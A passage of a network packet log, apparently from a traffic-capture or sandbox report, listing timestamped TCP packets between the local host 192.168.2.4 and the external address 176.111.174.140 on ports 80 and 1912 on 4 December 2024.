                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.526667118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.526765108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.526842117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.527868032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.528017044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.528088093 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.528903008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.529001951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.529073954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.529983997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.530088902 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.530214071 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.531136036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.531157017 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.531224012 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.532171965 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.532282114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.532345057 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.533273935 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.533389091 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.533430099 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.534379005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.534463882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.534562111 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.535495996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.535631895 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.535696030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.536634922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.536756992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.536828041 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.537734032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.537846088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.537926912 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.538835049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.538948059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.539014101 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.539938927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.540039062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.540121078 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.541151047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.541260004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.541332960 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.542172909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.542308092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.542383909 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.542774916 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.542855978 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.542866945 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.542903900 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.543000937 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.543011904 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.543046951 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.543454885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.543623924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.543689013 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.544331074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.544452906 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.544523001 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.545492887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.545648098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.545768023 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.546911955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.547091961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.547139883 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.547676086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.547811031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.547905922 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.548778057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.548890114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.548969030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.549916029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.550033092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.550098896 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.551011086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.551134109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.551187992 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.552072048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.552227020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.552301884 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.553235054 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.553466082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.553529978 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.554358959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.554464102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.554519892 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.555439949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.555602074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.555644989 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.556492090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.556615114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.556660891 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.557626963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.557811022 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.557882071 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.558727980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.558809996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.558887959 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.559890032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.560075045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.560137987 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.560988903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.561060905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.561125040 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.562087059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.562186003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.562252998 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.563128948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.616019011 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.697726011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.697798967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.697880030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.698245049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.698348045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.698402882 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.699297905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.699457884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.699505091 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.700465918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.700603008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.700649023 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.701594114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.701647997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.701697111 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.702650070 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.702833891 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.702893019 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.703785896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.704123020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.704174995 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.704921007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.705070019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.705127001 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.706156969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.706219912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.706269026 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.707140923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.707338095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.707406998 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.708168030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.708334923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.708376884 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.709291935 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.709394932 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.709459066 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.710371017 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.710462093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.710536003 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.711730003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.711843967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.711914062 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.712907076 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.712963104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.713020086 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.714078903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.714198112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.714253902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.715276957 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.715329885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.715392113 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.716166019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.716217995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.716278076 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.717036009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.717142105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.717212915 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.718118906 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.718355894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.718405008 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.719238043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.719327927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.719374895 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.720321894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.720443964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.720489979 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.721438885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.721565962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.721607924 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.722573042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.722651958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.722727060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.723671913 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.723788977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.723859072 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.724777937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.724911928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.724980116 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.726507902 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.726702929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.726762056 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.726927996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.727086067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.727161884 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.728343010 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.728456020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.728509903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.729140997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.729293108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.729367018 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.730248928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.730355978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.730432034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.731369972 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.731470108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.731529951 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.732486010 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.732671976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.732754946 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.733572006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.733644962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.733696938 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.734822989 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.734961033 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.735023022 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.735747099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.735871077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.735935926 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.736973047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.737173080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.737242937 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.738085985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.738148928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.738214970 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.739123106 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.739286900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.739340067 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.740709066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.740823984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.740886927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.741676092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.741758108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.741822958 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.742809057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.742896080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.742986917 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.743699074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.743786097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.743855953 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.744663954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.744781971 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.744873047 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.745820999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.745980024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.746043921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.746835947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.747003078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.747080088 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.747961044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.748065948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.748136997 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.749089003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.749258041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.749324083 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.750248909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.750354052 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.750433922 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.751341105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.751454115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.751522064 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.752386093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.752475977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.752537012 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.753479004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.753568888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.753633976 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.754637957 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.754682064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:39.754749060 CET4973880192.168.2.4176.111.174.140
